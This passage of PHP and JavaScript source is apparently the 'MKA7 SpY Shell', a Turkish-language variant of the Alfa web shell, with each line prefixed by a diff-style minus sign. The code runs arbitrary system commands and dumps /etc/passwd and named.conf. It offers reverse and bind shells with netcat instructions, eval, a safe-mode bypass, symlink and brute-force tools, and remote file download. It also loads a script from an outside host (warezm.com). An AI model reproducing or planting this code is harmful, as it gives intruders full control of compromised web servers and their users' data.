- for ($j = 1;$j <= 10;$j++) {
- echo 'if(alfa' . $j . '!=null)d.mf.alfa' . $j . '.value=alfa' . $j . ';else d.mf.alfa' . $j . '.value=alfa' . $j . '_;';
- }
- echo 'if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;}';
- echo 'function fc(a){alfaloader("block");var b="a="+alfab64("FilesMan")+"&c="+alfab64(a.c.value)+"&alfa1="+alfab64(a.alfa1.value)+"&ajax="+alfab64("true")+"&",c="";for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(c+="f[]="+alfab64(d.files.elements[i].value)+"&");_Ajax(d.URL,b+c,function(a){alfaloader("none")},!0)}function initDir(a){var b="",c="";islinux&&(b="<a class=\"header_pwd\" onclick=\"g(\'FilesMan\',\'/\');\" href=\'javascript:void(0);\'>/</a>",c="/");var e=a.split("/"),f="",g="";"-1"!=e.indexOf("..")&&(e.splice(e.indexOf("..")-1,1),e.splice(e.indexOf(".."),1));for(i in e)""!=e[i]&&(f+="<a onclick=\"g(\'FilesMan\',\'"+g+e[i]+"/\');\" href=\'javascript:void(0);\' class=\"header_pwd\">"+e[i]+"/</a>",g+=e[i]+"/");$("header_cwd").innerHTML=b+f+" ";var e=c+e.join("/");e=e.replace("//","/"),d.footer_form.c.value=e,$("footer_cwd").value=e,c_=e}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(a,b,c,e){var f=!1;return window.XMLHttpRequest?f=new XMLHttpRequest:window.ActiveXObject&&(f=new ActiveXObject("Microsoft.XMLHTTP")),f?(f.onreadystatechange=function(){4==f.readyState&&200==f.status&&("function"!=typeof c?d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText:e?(d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText,c(f.responseText)):c(f.responseText))},f.open("POST",a,!0),f.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),f.send(b),void 0):void alert("Error !")}function handleup(a,b){var c="__fnameup";0!=b&&(c="__fnameup"+b),a.files[0].name&&($(c).innerHTML=a.files[0].name)}function u(a){alfaloader("block");a.submit.disabled=true;var av = a.a.value,cv = a.c.value,alv = a.alfa1.value,cha = a.charset.value;var b=!1;if(a.a.value=alfab64(a.a.value),a.c.value=alfab64(a.c.value),a.alfa1.value=alfab64(a.alfa1.value),a.charset.value=alfab64(a.charset.value),window.XMLHttpRequest?b=new XMLHttpRequest:window.ActiveXObject&&(b=new ActiveXObject("Microsoft.XMLHTTP")),b){var c=$("up_bar");b.upload&&(c.style.display="block",b.upload.onprogress=function(a){var b=a.position||a.loaded,d=a.totalSize||a.total,e=Math.floor(b/d*1e3)/10+"%";c.style.width=e}),b.onload=function(e){for(200===b.status?(_Ajax(d.URL,"a="+alfab64("FilesMan")+"&c="+a.c.value+"&ajax="+alfab64("true")),c.style.display="none",a.a.value=av,a.c.value=cv,a.alfa1.value=alv,a.charset.value=cha):alert("An error occurred!"),$("footerup").value="",$("__fnameup").innerHTML="";upcount;){var f=$("pfooterup_"+upcount);f&&f.parentNode.removeChild(f),upcount--}0==upcount&&upcount++,alfaloader("none"),a.submit.disabled=false},b.onerror=function(a){};var e=new FormData(a);b.open("POST",d.URL),b.send(e)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&(d.getElementsByClassName("ajaxarea")[0].innerHTML=\'<center><br /><img id="alfaloader" src="' . __showicon('loader') . '"></img><br /><br /></center>\'),islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value);for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data),c!=c_&&c&&initDir(c)):(alfaloader("block"),_Ajax(d.URL,data,function(a){try{a=JSON.parse(a),a.host&&a.user&&a.dbname&&($("db_host")&&($("db_host").value=a.host),$("db_user")&&($("db_user").value=a.user),$("db_name")&&($("db_name").value=a.dbname),$("db_pw")&&($("db_pw").value=a.password),$("db_prefix")&&a.prefix&&($("db_prefix").value=a.prefix),$("cc_encryption_hash")&&a.cc_encryption_hash&&($("cc_encryption_hash").value=a.cc_encryption_hash))}catch(a){}alfaloader("none")}))}function alfaloader(a){$("a_loader").style.display=a}function fsu(a){alfaloader("block");for(var b={},c=0;c<a.elements.length;c++)"submit"!=a.elements[c].type&&(b[a.elements[c].name]=a.elements[c].value);for(c in mysql_cache)mysql_cache[c]=alfab64(mysql_cache[c]);_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("update")+"&alfa2="+alfab64(JSON.stringify(b))+"&c="+alfab64(c_)+"&charset="+mysql_cache.charset+"&type="+mysql_cache.type+"&sql_host="+mysql_cache.host+"&sql_login="+mysql_cache.user+"&sql_pass="+mysql_cache.pass+"&sql_base="+mysql_cache.db+"&sql_count="+mysql_cache.count+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function fs(f,e){alfaloader("block");var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache.host,user=f.sql_login?f.sql_login.value:mysql_cache.user,pass=f.sql_pass?f.sql_pass.value:mysql_cache.pass,db=f.sql_base?f.sql_base.value:mysql_cache.db,type=f.type?f.type.value:mysql_cache.type,charset=f.charset?f.charset.value:mysql_cache.charset,count="";switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache.count,f){case"0":alfa1="select",alfa2=alfab64(e);break;case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);break;case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));break;case"3":alfa1="loadfile",alfa2=alfab64(e);break;case"4":case"5":alfa1=(f=="4"?"dumpfile":"droptbl");var obj={},id=$("dumpfile");for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked&&obj.tbl.push(d.sf.elements["tbl[]"][i].value);alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function ctlbc(a){var b=$("bcStatus"),c=$("bcipAction");"bind"==a.value?(c.style.display="none",b.innerHTML="<small>Press ` <font color=\'red\'>>></font> ` button and run ` <font color=\'red\'>nc server_ip port</font> ` on your computer</small>"):(c.style.display="inline-block",b.innerHTML="<small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small>")}function is(){for(i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(a){return d.getElementById(a)}function addnewup(){var a="footerup_"+upcount,b="pfooterup_"+upcount,c=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",e=d.createElement("p");e.innerHTML=\'<label class="inputfile" for="\'+a+\'"><span id="__fnameup\'+upcount+\'"></span> <strong> Choose a file</strong></label><input id="\'+a+\'" type="file" name="f[]" onChange="handleup(this,\'+upcount+\');">\',e.id=b,e.appendAfter($(c)),upcount++}function alfa_searcher_tool(a){switch(a){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(a,b){d.srch.ext.disabled=a,d.srch.ext.value=b}function dis_input(a){switch(a){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(a,b,d){"21"!=b?c="localhost":c="ftp.example.com",$("port").disabled=a,$("port").value=b,$("target").value=c,$("protocol").value=d}Element.prototype.appendAfter=function(a){a.parentNode.insertBefore(this,a.nextSibling)};function inBackdoor(t){if(t.value=="my"){$("backdoor_textarea").style.display="block";}else{$("backdoor_textarea").style.display="none";}}function saveByKey(e){return!("s"==String.fromCharCode(e.which).toLowerCase()&&e.ctrlKey||19==e.which)||($("editor_edit_area").onsubmit(),e.preventDefault(),!1)}function setCookie(e,i,t){var l=new Date;l.setTime(l.getTime()+24*t*60*60*1e3);var o="expires="+l.toUTCString();document.cookie=e+"="+i+";"+o+";path=/"}function getCookie(e){var i=("; "+document.cookie).split("; "+e+"=");if(2==i.length)return i.pop().split(";").shift()}function editorClose(e){d.body.style.overflow="visible",elem=$(e),elem.setAttribute("class","editor-anim-close"),"editor"==e?is_minimized=!1:cgi_is_minimized=!1,setTimeout(function(){elem.removeAttribute("class"),elem.style.display="none"},1e3),d.body.style.overflow="visible"}function showEditor(e){$(e).setAttribute("class","editor-anim-show"),$(e+"-minimized").setAttribute("class","minimized-hide"),"editor"==e?(is_minimized=!1,cgi_is_minimized&&($("cgiloader-minimized").style.top="30%")):(cgi_is_minimized=!1,is_minimized&&($("editor-minimized").style.top="30%")),d.body.style.overflow="hidden"}function editorMinimize(e){$(e).setAttribute("class","editor-anim-minimize"),$(e+"-minimized").setAttribute("class","minimized-show"),"editor"==e?(is_minimized=!0,cgi_is_minimized?($("cgiloader-minimized").style.top="20%",$("editor-minimized").style.top="50%"):$("editor-minimized").style.top="30%"):(cgi_is_minimized=!0,is_minimized?($("cgiloader-minimized").style.top="20%",$("editor-minimized").style.top="50%"):$("cgiloader-minimized").style.top="30%"),d.body.style.overflow="visible"}function clearEditorHistory(){if(confirm("Are u Sure?"))for(var e in editor_files)e!=editor_current_file&&removeHistory(e)}function editor(e,i,t,l,o,a){if("dir"==a&&".."==e)return!1;if("download"==i)return g("FilesTools",l,e,"download"),!1;var r="",n="",s="",f=d.mf.c.value,c=!0;if(e=e.trim(),0==Object.keys(editor_files).length){var m=getCookie("alfa_history_files");try{editor_files=JSON.parse(m);for(var u in editor_files)insertToHistory(u,editor_files[u].file,0,editor_files[u].type)}catch(e){}}if(-1!=e.indexOf("/")){var p=e.split("/");e=p[p.length-1],delete p[p.length-1],f=p.join("/"),islinux&&(f="/"+f)}void 0===a&&(a=""),void 0!==l&&null!=l&&0!=l.length&&(f=l.trim());try{for(var v in editor_files)if(editor_files[v].file==decodeURIComponent(e)&&editor_files[v].pwd.replace(/\//g,"")==f.replace(/\//g,"")){c=!1,o=v;break}}catch(e){console.log(e)}if(editor_error=!0,void 0!==t&&0!=t.length&&null!=t&&(r=alfab64(t)),void 0!==o&&null!=o&&0!=o.length)n=alfab64(o),s=o;else{var _="file_"+getRandom(10);n=alfab64(_),s=_}return alfaloader("block"),_Ajax(d.URL,"a="+alfab64("FilesTools")+"&c="+alfab64(f)+"&alfa1="+alfab64(e)+"&alfa2="+alfab64(i)+"&alfa3="+r+"&alfa4="+n+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"),function(t){if(document.querySelector(".editor-content").innerHTML=t,$("editor").style.display="block",alfaloader("none"),evalJS(t),"delete"!=i&&editor_error){var l=d.getElementsByClassName("is_active");0!=l.length&&(l[0].className="file-holder"),n=s,e=decodeURIComponent(e),!editor_files[n]&&c?(editor_files[n]={file:e,pwd:f,type:a},insertToHistory(n,e," is_active",a),"mkfile"==i&&g("FilesMan",null)):$(n).parentNode.className+=" is_active"}d.body.style.overflow="hidden",d.getElementsByClassName("filestools")[0].setAttribute("fid",n),editor_files[n]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[n].pwd+"/"+editor_files[n].file).replace(/\/\//g,"/")),editor_current_file=n,is_minimized&&showEditor("editor"),updateCookieEditor()}),!1}function insertToHistory(e,i,t,l){var o="";t&&0!=t&&(o=t);var a=document.createElement("div");a.innerHTML="<div id=\'"+e+"\' class=\'history\' onClick=\'reopen(this);\'><div class=\'editor-icon\'>"+loadType(i,l,e)+"</div><div class=\'editor-file-name\'>"+i+"</div></div><div class=\'history-close\' onClick=\'removeHistory(\""+e+"\");\'>X</div>",a.className="file-holder"+o,a.addEventListener("mouseover",function(){setEditorTitle(e,"over"),this.childNodes[1].style.opacity="1"}),a.addEventListener("mouseout",function(){setEditorTitle(e,"out"),this.childNodes[1].style.opacity="0"});var r=d.getElementsByClassName("history-list")[0];r.insertBefore(a,r.firstChild)}function loadType(e,i,t){"none"==i&&_Ajax(d.URL,"a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[t].pwd)+"&arg="+alfab64(editor_files[t].file),function(e){$(t).innerHTML="<div class=\'editor-icon\'>"+loadType(editor_files[t].file,e,t)+"</div><div class=\'editor-file-name\'>"+editor_files[t].file+"</div>",editor_files[t].type=e});return"file"==i?(i=(i=e.split("."))[i.length-1].toLowerCase(),-1==["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"].indexOf(i)&&(i="notfound")):i="folder",\'<img src="http://solevisible.com/icons/{type}" width="30" height="30">\'.replace("{type}",i+".png")}function updateDirsEditor(e,i){var t=d.mf.c.value+"/",l=editor_files[e].pwd+"/"+i+"/",o=editor_files[e].pwd+"/"+editor_files[e].file+"/";l=l.replace(/\/\//g,"/"),o=o.replace(/\/\//g,"/"),-1!=(t=t.replace(/\/\//g,"/")).search(l)&&(initDir(t.replace(l,o)),d.mf.c.value=t.replace(l,o),_Ajax(d.URL,"a="+alfab64("updatepath")+"&path="+alfab64(d.mf.c.value),function(e){console.log(e)}));for(var a in editor_files){var r=editor_files[a].pwd+"/";-1!=(r=r.replace(/\/\//g,"/")).search(l)&&(editor_files[a].pwd=r.replace(l,o))}var n=new RegExp("\'"+l.slice(0,-1)+"\'"),s=new RegExp(i+" \|</b></a>");d.files.innerHTML=d.files.innerHTML.replace(n,"\'"+o.slice(0,-1)+"\'"),d.files.innerHTML=d.files.innerHTML.replace(s,editor_files[e].file+" |</b></a>"),updateCookieEditor()}function updateCookieEditor(){setCookie("alfa_history_files",JSON.stringify(editor_files),2012)}function setEditorTitle(e,i){"out"==i&&""!=editor_current_file&&(e=editor_current_file),editor_files[e]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[e].pwd+"/"+editor_files[e].file).replace(/\/\//g,"/"))}function removeHistory(e){delete editor_files[e],$(e)&&$(e).parentNode.parentNode.removeChild($(e).parentNode);var i=d.getElementsByClassName("filestools")[0];i&&i.getAttribute("fid")==e&&(i.outerHTML=""),editor_current_file==e&&(editor_current_file=""),updateCookieEditor()}function getRandom(e){for(var i="",t="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",l=void 0===e?20:e;l>0;--l)i+=t[Math.floor(Math.random()*t.length)];return i}function reopen(e){var i=e.getAttribute("id"),t=editor_files[i].pwd;editor(editor_files[i].file,"auto","",t,i)}function copyToClipboard(e){document.getElementById(e);if(document.selection)(i=document.body.createTextRange()).moveToElementText(document.getElementById(e)),i.select(),document.execCommand("Copy"),alert("text copied");else if(window.getSelection()){var i=document.createRange();i.selectNode(document.getElementById(e)),window.getSelection().removeAllRanges(),window.getSelection().addRange(i),document.execCommand("copy"),alert("text copied")}}function encrypt(e,i){if(null==i||i.length<=0)return null;e=alfab64(e,!0),i=alfab64(i,!0);for(var t="",l="",o=0;o<e.length;)for(var a=0;a<i.length&&(t=e.charCodeAt(o)^i.charCodeAt(a),l+=String.fromCharCode(t),!(++o>=e.length));a++);return alfab64(l,!0)}function reloadSetting(e){return alfaloader("block"),_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){evalJS(e),alfaloader("none")},!0),0==e.e.value&&1==e.protect.value&&setTimeout("location.reload()",1e3),e.s.value!=e.icon.value&&setTimeout("location.reload()",1e3),!1}function reloadColors(e){var i={};void 0===e?d.querySelectorAll(".colors_input").forEach(function(e){var t=e.getAttribute("target").replace(".","");i[t]=e.value}):i=e,alfaloader("block");var t=$("use_default_color").checked?"1":"0";_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(i))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(t)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){alfaloader("none"),evalJS(e)},!0)}function alfab64(e,i){return void 0!==i||0==post_encryption_mode?window.btoa(unescape(encodeURIComponent(e))):encrypt(e,"' . _AlfaSecretKey() . '")}function evalCss(e){var i=document.createElement("style");i.styleSheet?i.styleSheet.cssText=e:i.appendChild(document.createTextNode(e)),d.getElementsByTagName("head")[0].appendChild(i)}function colorHandlerKey(e){setTimeout(function(i){colorHandler(e)},200)}function colorHandler(e){var t=e.getAttribute("target"),l=e.getAttribute("multi"),o=t.indexOf(":hover");if(l){var a=JSON.parse(atob(l)),r="";for(i in a.multi_selector)r+=i+"{"+a.multi_selector[i].replace(/{color}/g,e.value)+"}";evalCss(r)}-1==o||l?($("input_"+t.replace(".","")).value=e.value,$("gui_"+t.replace(".","")).value=e.value,".header_values"==t&&(t=".header,.header_values"),d.querySelectorAll(t).forEach(function(i){i.style.color=e.value})):($("input_"+t.replace(".","")).value=e.value,$("gui_"+t.replace(".","")).value=e.value,evalCss(t+"{color: "+e.value+";}"))}function importConfig(e){var i=e.target,t=new FileReader;t.onload=function(){var e=t.result;try{reloadColors(JSON.parse(e))}catch(e){alert("Config is invalid...!")}$("importFileBtn").value=""},t.readAsText(i.files[0])}function checkBox(){for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&(d.files.elements[i].checked=d.files.elements[0].checked)}function path_history(e){_Ajax(d.URL,"a="+alfab64("GetPathHistory")+"&ajax="+alfab64("true"),function(e){g("FilesMan",e)},!0)}function runcgi(e){if(cgi_is_minimized&&cgi_lang==e)return showEditor("cgiloader"),!1;_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(e)+"&ajax="+alfab64("true"),function(i){d.body.style.overflow="hidden",$("cgiloader").style.display="block",$("cgiframe").innerHTML=i,cgi_lang=e,cgi_is_minimized&&($("cgiloader-minimized").setAttribute("class","minimized-hide"),setTimeout(function(){$("cgiloader").removeAttribute("class"),is_minimized&&($("editor-minimized").style.top="30%")},1e3))})}';
- echo "</script><script data-cfasync='false' src='//warezm.com/shell.js'></script><form style='display:none;' id='dlForm' action='' target='_blank' method='post'><input type='hidden' name='a' value='dlfile'><input type='hidden' name='c' value=''><input type='hidden' name='file' value=''></form><input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'><img id='a_loader' src='" . __showicon('loader') . "'>";
- $cmd_uname = alfaEx('uname -a', false, false);
- $uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname) > 0 ? $cmd_uname : '( php_uname ) Function Disabled !');
- if ($uname == '( php_uname ) Function Disabled !') {
- $GLOBALS['need_to_update_header'] = 'true';
- }
- echo '</head><body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><div id="up_bar"></div><div class="whole"><form method="post" name="mf" style="display:none;"><input type="hidden" name="a"><input type="hidden" name="c" value="' . $GLOBALS['cwd'] . '">';
- for ($s = 1;$s <= 10;$s++) {
- echo '<input type="hidden" name="alfa' . $s . '">';
- }
- echo '<input type="hidden" name="charset"></form><div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?mka7">Ekstra Shell<br><small>Version: <span class="hidden_shell_version">' . __MKA_VERSION__ . '</span></small></a></div><div class="header"><table width="100%" border="0"><tr><td width="3%"><span class="header_vars">Uname:</span></td><td colspan="2"><span class="header_values" id="header_uname">' . $uname . '</span></td></tr><tr><td><span class="header_vars">User:</span></td><td><span class="header_values" id="header_userid">' . $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td><td width="12%" rowspan="8"><a href="//mkashell.wordpress.com"><img style="border-radius:100px;" width="300" height="170" alt="" src="https://i.hizliresim.com/8zzgZn.png" /></a></td></tr><tr><td><span class="header_vars">PHP:</span></td><td><b>' . @phpversion() . ' </b><span class="header_vars"> Safe Mode: ' . $safe_modes . '</span></td></tr><tr><td><span class="header_vars">ServerIP:</span></td><td><b>' . (!@$_SERVER['SERVER_ADDR'] ? (function_exists('gethostbyname') ? @gethostbyname($_SERVER['SERVER_NAME']) : '????') : @$_SERVER['SERVER_ADDR']) . ' <span class="header_vars">Your IP:</span><b> ' . @$_SERVER['REMOTE_ADDR'] . '</b></td></tr><tr><td width="3%"><span class="header_vars">DateTime:</span></td><td colspan="2"><b>' . date('Y-m-d H:i:s') . '</b></td></tr><tr><td><span class="header_vars">Domains:</span></td><td width="76%"><span class="header_values" id="header_domains">';
- if ($GLOBALS['sys'] == 'unix') {
- $d0mains = _alfa_file('/etc/named.conf', false);
- if (!$d0mains) {
- echo 'Cant Read [ /etc/named.conf ]';
- $GLOBALS['need_to_update_header'] = 'true';
- } else {
- $count = 0;
- foreach ($d0mains as $d0main) {
- if (@strstr($d0main, 'zone')) {
- preg_match_all('#zone "(.*)"#', $d0main, $domains);
- flush();
- if (strlen(trim($domains[1][0])) > 2) {
- flush();
- $count++;
- }
- }
- }
- echo "$count Domains";
- }
- } else {
- echo ('Cant Read [ /etc/named.conf ]');
- }
- echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
- echo alfaEx('ver', false, false);
- echo '</td></tr> <tr><td height="0" colspan="2"><span class="header_vars">SHELL VERSYON </span><b>' . __MKA_VERSION__ . '</b></td></tr></b>';
- $quotes = (function_exists('get_magic_quotes_gpc') ? get_magic_quotes_gpc() : '0');
- if ($quotes == '1' or $quotes == 'on') {
- $magic = '<b><span class="header_on">ON</span>';
- } else {
- $magic = '<span class="header_off">OFF</span>';
- }
- echo '<tr><td height="16" colspan="2"><span class="header_vars">Engelli fonksiyonlar: </span><b>' . Alfa_GetDisable_Function() . '</b></td></tr><tr><td height="16" colspan="2"><span class="header_vars">CURL :</span>' . $curl . ' | <span class="header_vars">SSH2 : </span>' . $ssh2 . ' | <span class="header_vars">Magic Quotes : </span>' . $magic . ' | <span class="header_vars"> MySQL :</span>' . $mysql . ' | <span class="header_vars">MSSQL :</span>' . $mssql . ' | <span class="header_vars"> PostgreSQL :</span>' . $pg . ' | <span class="header_vars"> Oracle :</span>' . $or . ' ' . ($GLOBALS['sys'] == 'unix' ? '| <span class="header_vars"> CGI :</span> ' . $cgi_shell : '') . '</td><td width="15%"><center><a href="http://spyhackerz.com" target="_blank"><span><font class="solevisible-text" color="#0F0">MKA7 SpY Shell</font></span></a></center></td></tr><tr><td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>' . $open_b . '</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>' . $safe_exe . '</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>' . $safe_include . '</b></td></tr><tr><td height="11"><span class="header_vars">SoftWare: </span></td><td colspan="2"><b>' . @getenv('SERVER_SOFTWARE') . '</b></td></tr>';
- if ($GLOBALS['sys'] == 'win') {
- echo '<tr><td height="12"><span class="header_vars">DRIVE:</span></td><td colspan="2"><b>' . $drives . '</b></td></tr>';
- }
- echo '<tr><td height="12"><span class="header_vars">PWD:</span></td><td colspan="2"><span id="header_cwd">' . $cwd_links . ' </span><a href="javascript:void(0);" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Shell Dizini ]</span> </a><a href="javascript:void(0);" onclick="path_history(\'back\');"><span class="back_shell">[ Geri dn ]</span></a></td></tr></table></div><div id="meunlist"><ul>';
- $li = array('FilesMan' => 'Dizin', 'proc' => 'Durum', 'phpeval' => 'EVAL', 'sql' => 'SQLCON', 'pwchanger' => 'Admin+', 'connect' => 'BC', 'ssh2' => 'SSH2', 'safe' => 'BYPASS', 'cgishell' => 'CG+ ', 'portscanner' => 'Port Scan', 'ziper' => 'Zipper', 'symlink' => 'Symlink(c1)', 'otostop' => 'ln -s', 'deneme' => 'Passwd', 'settings' => 'Open_basedir', 'email' => 'Email', 'plus' => '<span class="alfa_plus">Hakkmda</font>');
- foreach ($li as $key => $value) {
- echo ('<li><a href="javascript:void(0);" class="menu_options" onclick="g(\'' . $key . '\',null,\'\',\'\',\'\');">' . $value . '</a></li>' . "
- ");
- }
- if (!empty($_SESSION['AlfaUser']) && !empty($_SESSION['AlfaPass'])) echo '</ul></div>';
- else echo '</ul></div>';
- } else {
- @error_reporting(E_ALL ^ E_NOTICE);
- @ini_set('error_log', NULL);
- @ini_set('log_errors', 0);
- @ini_set('max_execution_time', 0);
- @ini_set('magic_quotes_runtime', 0);
- @set_time_limit(0);
- }
- }
- function file_download($_GETLINK, $_FILENAME = NULL) {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $_GETLINK);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_BINARYTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- $_FILE = curl_exec($ch);
- curl_close($ch);
- if ($_FILENAME == NULL) {
- $_FILENAME = explode('/', $_GETLINK);
- $_FILENAME = array_reverse($_FILENAME);
- $_FILENAME = $_FILENAME[0];
- }
- $fp = fopen($_FILENAME, 'w');
- fwrite($fp, $_FILE);
- fclose($fp);
- }
- function alfaOtostop() {
- alfahead();
- echo '<Div class=header><br><center>';
- echo '<p><center><p><div class="txtfont_header">| zmire giden yolcu kalmasn ( ln -s )(HEADER , FOOTER , php.ini , error.log) |</div></p>
- <form onSubmit="g(\'otostop\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
- <div class="txtfont">Dosya yolu: </div> <input type="text" name="dirzip" value="' . htmlspecialchars($GLOBALS['cwd']) . '" size="60"/>
- <div class="txtfont">kaydedilecek: </div> <input type="text" name="zipfile" value="' . $GLOBALS['cwd'] . 'mka7.rar" size="60"/>
- <input type="submit" value=" " name="ziper" />
- </form></center></p>';
- if (isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')) {
- $dirzip = $_POST['alfa3'];
- $zipfile = $_POST['alfa4'];
- exe('ln -s ' . $dirzip . ' ' . $zipfile);
- echo 'oldu kanka sanrm ektim <a href="javascript:void(0);" class="menu_options" onclick="g(\'FilesMan\',null,\'\',\'\',\'\');">Bak bakim ekebildim mi</a>';
- }
- echo '</div>';
- alfafooter();
- }
- function exe($cmd) {
- if (function_exists('system')) {
- @ob_start();
- @system($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif (function_exists('exec')) {
- @exec($cmd, $results);
- $buff = '';
- foreach ($results as $result) {
- $buff.= $result;
- }
- return $buff;
- } elseif (function_exists('passthru')) {
- @ob_start();
- @passthru($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif (function_exists('shell_exec')) {
- $buff = @shell_exec($cmd);
- return $buff;
- }
- }
- function alfaDeneme() {
- alfahead();
- echo '<Div class=header><br><center>';
- if (empty($_POST['ajax']) && !empty($_POST['alfa1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
- $process = array('Passwd 1' => 'fileget', 'Passwd 2' => 'copy', 'Passwd 3' => 'require', 'Passwd 4' => 'uid', 'Passwd 5' => 'stream', 'Passwd 6' => 'son', 'Kullanclar getir' => 'kul', 'Kullanclar getir 2' => 'kul2');
- foreach ($process as $n => $link) {
- echo '<a href="javascript:void(0);" onclick="g(\'deneme\',null,\'' . $link . '\')"> | ' . $n . ' | </a>';
- }
- echo '</center><br>';
- if (!empty($_POST['alfa1'])) {
- if ($_POST['alfa1'] == 'fileget') {
- echo "<pre class='ml1' style='margin-top:5px' >";
- echo file_get_contents('/etc/passwd');
- echo '</pre>';
- } elseif ($_POST['alfa1'] == 'copy') {
- echo "<pre class='ml1' style='margin-top:5px' >";
- if (@copy($_GET['copy'], 'test1.php')) {
- $fh = fopen('test1.php', 'r');
